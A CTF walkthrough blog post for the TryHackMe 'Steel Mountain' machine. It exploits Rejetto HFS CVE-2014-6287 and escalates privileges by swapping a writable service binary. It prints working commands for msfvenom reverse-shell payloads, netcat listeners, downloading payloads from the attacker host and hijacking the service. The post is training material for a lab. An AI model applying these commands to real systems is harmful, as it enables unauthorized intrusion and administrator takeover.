TryHackMe-Steel Mountain

This is a Mr. Robot themed Windows machine.We Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.For Exploitation,I will cover both Mannual Way and Through Metasploit as well.

We begin with an Nmap Scan

You will find the Employee’s name if you go to the webpage running at port 80 , and Right Click and Inspect Element.

Moving On, there is a (Rejetto HTTP File Server) running at port 8080

Upon using google, we immediately get a Exploit (CVE-2014–6287) for this webserver.Run Metasploit and lets roll…

use 0
show options
set RHOSTS <target ip>
set RPORT 8080
run

And we have a meterpreter shell.The user flag can be found in the location C:\Users\bill\Desktop .At the end of this writeup, I will also cover how to run this Exploit Manually(without using metasploit) but lets continue with our next set and Privilege Escalate to become Admin.

Now this is the part of the CTF which will require a bit of understanding so i’ll break it down as simple as possible.This explaination will make things easier so read it carefully.

First we will get a Privilege Escalation Enumeration script called (PowerUp) in our target machine and run its Invoke-AllChecks command which basically find all services and any privilege escalation vectors.You can also use Winpeas as well.

Then we will find a windows service called AdvancedSystemCareService9 which runs with the Admin privileges and we can also change it’s path!!! .THIS GIVES US THE OPPORTUNITY TO UPLOAD OUR MALICIOUS SCRIPT IN THE PATH OF AdvancedSystemCareService9.

So what will our Malicious Script do? -It will connect back to our netcat listener and give use Admin Shell(NT Authority)

LETS BEGIN…

To enumerate this machine, we will use a powershell script called PowerUp, that’s purpose is to evaluate a Windows machine and determine any abnormalities — “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

You can download the script here. Now you can use the upload command in Metasploit to upload the script.

To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell

Looking at the output there is one particular service where the CanRestart option is set to true:

With this value set to true, we are able to restart this service on the system. The directory to the application is also writeable. This means we can replace the legitimate application with a malicious one and once the service is restarted, our malicious program will run.

msfvenom can be used to generate a reverse shell as a windows executable:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.22.145 LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe

This can then be uploaded to the target machine via the meterpreter shell (exit out of the PowerShell session first via CTRL+C):

upload ASCService.exe

Dropping back into a windows shell we can stop the legitimate service running and then replace the application file with the malicious binary:

sc stop AdvancedSystemCareService9copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

Before restarting the service, we need to set up a listener within our local terminal:

nc -nlvp 4443

The service can then be restarted within the windows shell:

sc start AdvancedSystemCareService9

Once the service restarts,you will get a reverse connecton on your netcat listener.From here we can switch to the Administrator’s Desktop directory and grab the root.txt file:

NOTE: You might find an error on your shell such as this which is normal

The Reason we get this error is because AdvancedSystemCareService9 is a legit executable file and instead of it we are running our malicious binary.

Download the script from https://www.exploit-db.com/exploits/39161

Change the IP to your IP(tryhackme attacker machine ip(tun0)) and the port to some other port maybe 4545. Now Give the script a read and you will find that we need to host nc.exe in our local webserver at port 80.

You can get the nc.exe binary on github or simply search it in your terminal.

Once i have found nc.exe , i’ll copy it to /var/www/html and start apache2 server with runs on port 80 (as our exploit required) OR INSTEAD OF DOING ALL THIS, WE CAN ALSO SIMPLY START A PYTHON WEB SERVER AT PORT 80 using the command > python -m SimpleHttpServer 80

Now make sure to keep a netcat listener read at port 4545 (take a look at my exploit, 4545 is the Lport)

SO i finally run our exploit which i had saved as “steel.py” Here 10.10.200.57 is my target ip and 8080 is the target port(the port at which Rejetto web server is running on.The usage has also been mentioned in the exploit code.Read it carefully.)

And Volia, we have a shell in our netcat listener.To view the user flag, head over to C:\Users\bill\Desktop and use the command type to read it

Now we will upload Winpeas which is a popular script to find Possible Privilege Escalation Attack vector on windows.To Upload any file to your machine, you can use Certutil which is very popular or Invoke-WebRequest

Get winPEAS

powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://<attacker ip>/winPEAS.exe"

Verify the file s downloaded

dir

Run winPEAS.exe

winPEAS.exe

Note the unquoted path

AdvancedSystemCareService9C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe

For manually listing services we use the command:

powershell -c "Get-Service"

ANSWER : powershell -c “Get-Service”

Go to the path

cd \Program Files (x86)\IObit\Advanced SystemCare

Back to attacker’s machine, create msfvenom payload

msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1234 -f exe -o ASCService.exe

Create listener on port 1234

nc -lvp 1234

Back to victim’s machine, stop service

sc stop AdvancedSystemCareService9

Backup ASCService.exe

rename ASCService.exe ASCService_bak.exe

Download our payload

powershell -c "Invoke-WebRequest -OutFile ASCService.exe http://10.8.3.50/ASCService.exe"

Start the service

sc start AdvancedSystemCareService9

Go back to your netcat listener running at port 1234 and run whoami command to ensure you are admin(NT Authority)

For the mannual exploitation part, you can also take a look at this writeup by Zach Heller in case of any doubts(https://zacheller.dev/thm-steelmountain).I hope you learned from this writeup.

-ZEUS

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube